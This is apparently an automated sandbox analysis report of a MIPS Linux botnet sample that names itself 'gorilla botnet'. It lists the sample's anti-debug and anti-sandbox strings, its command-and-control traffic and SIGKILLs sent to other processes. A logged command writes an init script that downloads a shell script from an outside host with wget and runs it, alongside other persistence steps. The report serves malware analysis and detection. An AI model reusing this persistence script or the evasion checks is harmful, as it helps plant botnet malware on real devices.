Source: mips.nn.elf |
ReversingLabs: Detection: 42% |
Source: mips.nn.elf |
String: Found And Killed Process: PID=%d, Realpath=%s7815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)/fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/null 2>&1Debugger (gdb) detected. Exiting. gorilla botnet didnt like this honeypot....which lldb > /dev/null 2>&1Debugger (lldb) detected. Exiting. gorilla botnet didnt like this honeypot....which dtrace > /dev/null 2>&1Debugger (dtrace) detected. Exiting. gorilla botnet didnt like this honeypot....which truss > /dev/null 2>&1Debugger (truss) detected. Exiting. gorilla botnet didnt like this honeypot....which ptrace > /dev/null 2>&1Debugger (ptrace) detected. Exiting. gorilla botnet didnt like this honeypot....LD_PRELOADSandbox detected (LD_PRELOAD). Exiting. gorilla botnet didnt like this honeypot....LD_LIBRARY_PATHSandbox detected (LD_LIBRARY_PATH). Exiting. gorilla botnet didnt like this honeypot....LD_AUDITSandbox detected (LD_AUDIT). Exiting. gorilla botnet didnt like this honeypot..../proc/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot..../etc/motdw%s |
Source: global traffic |
TCP traffic: 91.92.246.113 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 93.123.85.166 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 154.216.17.220 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 192.168.2.15:53984 -> 45.202.35.64:199 |
Source: global traffic |
TCP traffic: 192.168.2.15:51014 -> 154.216.17.220:38241 |
Source: global traffic |
TCP traffic: 192.168.2.15:41512 -> 91.92.246.113:38241 |
Source: global traffic |
TCP traffic: 192.168.2.15:48922 -> 93.123.85.166:38241 |
Source: /tmp/mips.nn.elf (PID: 5510) |
Socket: 0.0.0.0:38241 |
Jump to behavior |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: global traffic |
DNS traffic detected: DNS query: daisy.ubuntu.com |
Source: profile.12.dr, mips.nn.elf.32.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr |
String found in binary or memory: http://pen.gorillafirewall.su/ |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: Found And Killed Process: PID=%d, Realpath=%s7815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)/fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt487154914:1553<41<515791446<6145 |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: /tmp/mips.nn.elf (PID: 5512) |
SIGKILL sent: pid: 793, result: successful |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5512) |
SIGKILL sent: pid: 888, result: successful |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5512) |
SIGKILL sent: pid: 1729, result: successful |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5512) |
SIGKILL sent: pid: 3273, result: successful |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5512) |
SIGKILL sent: pid: 3278, result: successful |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5512) |
SIGKILL sent: pid: 5521, result: successful |
Jump to behavior |
Source: classification engine |
Classification label: mal84.spre.troj.evad.linELF@0/11@2/0 |
Source: /tmp/mips.nn.elf (PID: 5510) |
File: /etc/profile |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5510) |
File: /etc/rc.local |
Jump to behavior |
Source: /usr/bin/ln (PID: 5536) |
File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinary |
Jump to behavior |
Source: /usr/bin/ln (PID: 5552) |
File: /etc/rc.d/S99mips.nn.elf -> /etc/init.d/mips.nn.elf |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5510) |
File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) |
Jump to behavior |
Source: /usr/bin/chmod (PID: 5533) |
File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx) |
Jump to behavior |
Source: /usr/bin/chmod (PID: 5546) |
File: /etc/init.d/mips.nn.elf (bits: - usr: rx grp: rx all: rwx) |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5514) |
Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5527) |
Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5534) |
Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5537) |
Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf" |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5542) |
Shell command executed: sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5547) |
Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5550) |
Shell command executed: sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1" |
Jump to behavior |
Source: /bin/sh (PID: 5533) |
Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinary |
Jump to behavior |
Source: /bin/sh (PID: 5546) |
Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mips.nn.elf |
Jump to behavior |
Source: /bin/sh (PID: 5549) |
Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d |
Jump to behavior |
Source: /bin/sh (PID: 5520) |
Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5510) |
File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) |
Jump to behavior |
Source: /usr/bin/chmod (PID: 5533) |
File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx) |
Jump to behavior |
Source: /usr/bin/chmod (PID: 5546) |
File: /etc/init.d/mips.nn.elf (bits: - usr: rx grp: rx all: rwx) |
Jump to behavior |
Source: /tmp/mips.nn.elf (PID: 5510) |
Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinary |
Jump to dropped file |
Source: /tmp/mips.nn.elf (PID: 5510) |
Writes shell script file to disk with an unusual file extension: /etc/rc.local |
Jump to dropped file |
Source: /bin/sh (PID: 5537) |
Writes shell script file to disk with an unusual file extension: /etc/init.d/mips.nn.elf |
Jump to dropped file |
Source: /tmp/mips.nn.elf (PID: 5510) |
File: /etc/init.d/mybinary |
Jump to dropped file |
Source: /bin/sh (PID: 5537) |
File: /etc/init.d/mips.nn.elf |
Jump to dropped file |
Source: /tmp/mips.nn.elf (PID: 5510) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: mips.nn.elf, 5510.1.00007ffff29c8000.00007ffff29e9000.rw-.sdmp |
Binary or memory string: U/tmp/qemu-open.XqNobR\ |
Source: mips.nn.elf, 5510.1.00007ffff29c8000.00007ffff29e9000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.nn.elf |
Source: mips.nn.elf, 5510.1.000055c525940000.000055c5259c7000.rw-.sdmp |
Binary or memory string: U!/etc/qemu-binfmt/mips |
Source: mips.nn.elf, 5510.1.000055c525940000.000055c5259c7000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/mips |
Source: mips.nn.elf, 5510.1.00007ffff29c8000.00007ffff29e9000.rw-.sdmp |
Binary or memory string: /tmp/qemu-open.XqNobR |
Source: mips.nn.elf, 5510.1.00007ffff29c8000.00007ffff29e9000.rw-.sdmp |
Binary or memory string: %s/qemu-op |
Source: mips.nn.elf, 5510.1.00007ffff29c8000.00007ffff29e9000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-mips |
Source: mips.nn.elf, 5510.1.00007ffff29c8000.00007ffff29e9000.rw-.sdmp |
Binary or memory string: MPDIR%s/qemu-op |
Source: Yara match |
File source: mips.nn.elf, type: SAMPLE |
Source: Yara match |
File source: 5510.1.00007f4a18400000.00007f4a18419000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: mips.nn.elf PID: 5510, type: MEMORYSTR |
Source: Yara match |
File source: mips.nn.elf, type: SAMPLE |
Source: Yara match |
File source: 5510.1.00007f4a18400000.00007f4a18419000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: mips.nn.elf PID: 5510, type: MEMORYSTR |